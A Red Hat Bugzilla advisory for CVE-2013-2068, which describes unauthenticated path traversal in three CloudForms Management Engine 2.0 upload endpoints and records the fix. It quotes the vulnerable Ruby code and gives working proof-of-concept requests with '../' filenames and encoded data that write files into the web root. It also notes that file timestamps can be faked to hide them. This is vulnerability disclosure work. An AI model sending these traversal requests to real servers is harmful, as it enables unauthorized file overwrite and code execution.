Bug 960422 (CVE-2013-2068)

Summary: CVE-2013-2068 CFME 2.0 multiple zip file upload path traversal vulnerabilities
Product: [Other] Security Response Reporter: Kurt Seifried <kseifried>
Component: vulnerabilityAssignee: Red Hat Product Security <security-response-team>
Status: CLOSED ERRATA QA Contact:
Severity: urgent Docs Contact:
Priority: urgent    
Version: unspecifiedCC: bdunne, dclarizi, gmccullo, jfrey, jrafanie, kseifried, mjc, mpovolny, obarenbo, rcvalle, security-response-team, sseago, xlecauch
Target Milestone: ---Keywords: Reopened, Security
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard: impact=critical,public=20130904,reported=20130506,source=redhat,cvss2=10.0/AV:N/AC:L/Au:N/C:C/I:C/A:C,cwe=CWE-73->CWE-22,cfme-5/Security=affected
Fixed In Version: Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2013-09-04 14:49:56 EDT Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---
Bug Depends On: 960711, 960742, 960743    
Bug Blocks: 951654, 960425    

Description Kurt Seifried 2013-05-07 03:58:04 EDT
Ramon de C Valle (rcvalle@redhat.com) reports:

Multiple path traversal exist within the 

1) log method of AgentController controller of CFME. The log method can be 
accessed directly at http://host/agent/log.

The log method deletes (if the file exists) and creates a file using the
user-controlled filename parameter without sanitizing it. The contents
of the file are subsequently written as the user-controlled data
parameter as ZIP encoded data.

In vmdb/app/controllers/agent_controller.rb:56:

    data = MIQEncode.decode(params["data"])
    file = File.join(proxy.logdir, params["filename"])
    options = params["options"]
    $log.info "MIQ(agent-log): [#{options.inspect}]" unless
params["options"].nil?

    File.delete(file) if File.exists?(file)
    $log.info "MIQ(agent-log): Create file: #{file}"
    File.open(file, "wb") {|f| f.write(data)}

This vulnerability can be exploited by sending a specially crafted
request containing a valid host guid that has at least one associated
proxy. For instance, the following GET request creates the file
pwned.txt containing the word 'pwned' at the /var/www/miq/vmdb/public/
directory.

https://host/agent/log?&id=8dfc29fe-a118-11e2-805c-005056920a2c&filename=../../../../../../../../../var/www/miq/vmdb/public/pwned.txt&data=eJwrKM9LTQEABokCHw==

Where id is a valid host guid that has at least one associated proxy,
and data is encoded as follows:

[rcvalle@ThinkPad ~]$ irb
irb(main):001:0> require 'zlib'
=> true
irb(main):002:0> [Zlib::Deflate.deflate('pwned')].pack('m')
=> "eJwrKM9LTQEABokCHw==\n"
irb(main):003:0>

Additionaly, the file modification time can also be specified with the
user-supplied mtime parameter which is set by the log method after the
file is created. This could be used for hiding the file from searches
for newly created files.

2) upload method of AgentController controller of CFME. The upload 
method can be accessed directly at http://host/agent/upload.

The upload method deletes (if the file exists) and creates a file using
the user-controlled filename parameter without sanitizing it. The
contents of the file are subsequently written as the user-controlled
data parameter as ZIP encoded data.

In vmdb/app/controllers/agent_controller.rb:102:

    file = File.join(mediadir, params["filename"])
    md5 = Digest::MD5.hexdigest(data).to_s
    raise "upoload of file #{file} failed, md5 mismatch, expected
#{params["md5"]}, got #{md5}" if params["md5"] != md5

    $log.info "MIQ(agent-upload): Saving agent file: #{file}"
    File.delete(file) if File.exists?(file)
    $log.info "MIQ(agent-upload): Create file: #{file}"
    File.open(file, "wb") {|f| f.write(data); f.close}

This vulnerability can be exploited by sending a specially crafted
request containing a valid platform in the first 4 bytes of the data
parameter, the MD5 checksum of the data parameter, and any numeric value
as the agent version. For instance, the following GET request creates
the file pwned.txt containing the word 'pwned' at the
/var/www/miq/vmdb/public/ directory.

https://host/agent/upload?&filename=../../../../../../../../../var/www/miq/vmdb/public/pwned.txt&data=eJyrd/VxKyjPS00BABDkA3U=&md5=b131830a18266f83111d9149adb6451d&version=1

Where data is encoded as follows:

[rcvalle@ThinkPad ~]$ irb
irb(main):001:0> require 'zlib'
=> true
irb(main):002:0> [Zlib::Deflate.deflate("\x7f\x45\x4c\x46pwned")].pack('m')
=> "eJyrd/VxKyjPS00BABDkA3U=\n"

And md5 as follows:

irb(main):003:0> require 'digest/md5'
=> true
irb(main):004:0> Digest::MD5.hexdigest("\x7f\x45\x4c\x46pwned")
=> "b131830a18266f83111d9149adb6451d"

3) linuxpkgs method of AgentController controller of CFME. The log method can 
be accessed directly at http://host/agent/linuxpkgs.

The linuxpkgs method deletes (if the file exists) and creates a file
using the user-controlled filename parameter without sanitizing it. The
contents of the file are subsequently written as the user-controlled
data parameter as ZIP encoded data.

In vmdb/app/controllers/agent_controller.rb:119:

    filename = params["filename"]
    datadir = File.join(File.expand_path(Rails.root), "data",
"applications")
    Dir.mkdir datadir unless File.exists?(datadir)

    file = File.join(datadir, filename)
    data = MIQEncode.decode(params["data"])
    md5 = Digest::MD5.hexdigest(data).to_s

    raise "upoload of file #{file} failed, md5 mismatch, expected
#{params["md5"]}, got #{md5}" if params["md5"] != md5

    File.delete(file) if File.exists?(file)
    $log.info "MIQ(agent-upload): Create file: #{file}"
    File.open(file, "wb") {|f| f.write(data); f.close}

This vulnerability can be exploited by sending a specially crafted
request containing the MD5 checksum of the data parameter. For instance,
the following GET request creates the file pwned.txt containing the word
'pwned' at the /var/www/miq/vmdb/public/ directory.

https://host/agent/linuxpkgs?&filename=../../../../../../../../../var/www/miq/vmdb/public/pwned.txt&data=eJwrKM9LTQEABokCHw==&md5=5e93de3efa544e85dcd6311732d28f95

Where data is encoded as follows:

[rcvalle@ThinkPad ~]$ irb
irb(main):001:0> require 'zlib'
=> true
irb(main):002:0> [Zlib::Deflate.deflate('pwned')].pack('m')
=> "eJwrKM9LTQEABokCHw==\n"

And md5 as follows:

irb(main):003:0> require 'digest/md5'
=> true
irb(main):004:0> Digest::MD5.hexdigest('pwned')
=> "5e93de3efa544e85dcd6311732d28f95"
Comment 2 Kurt Seifried 2013-05-07 14:18:04 EDT
Please note that the zip file is unpacked after uploading meaning that arbitrary file creation and overwrite of file writable by the server server process is possible. Additionally code execution is possible.
Comment 3 Ramon de C Valle 2013-05-07 14:56:40 EDT
Note that authentication also is not required for these resources.
Comment 14 errata-xmlrpc 2013-09-04 14:10:26 EDT
This issue has been addressed in following products:

  Red Hat CloudForms Management Engine 2.0

Via RHSA-2013:1206 https://rhn.redhat.com/errata/RHSA-2013-1206.html
Comment 16 Vincent Danen 2013-09-26 15:06:19 EDT
Acknowledgements:

This issue was discovered by Ramon de C Valle of the Red Hat Product Security Team.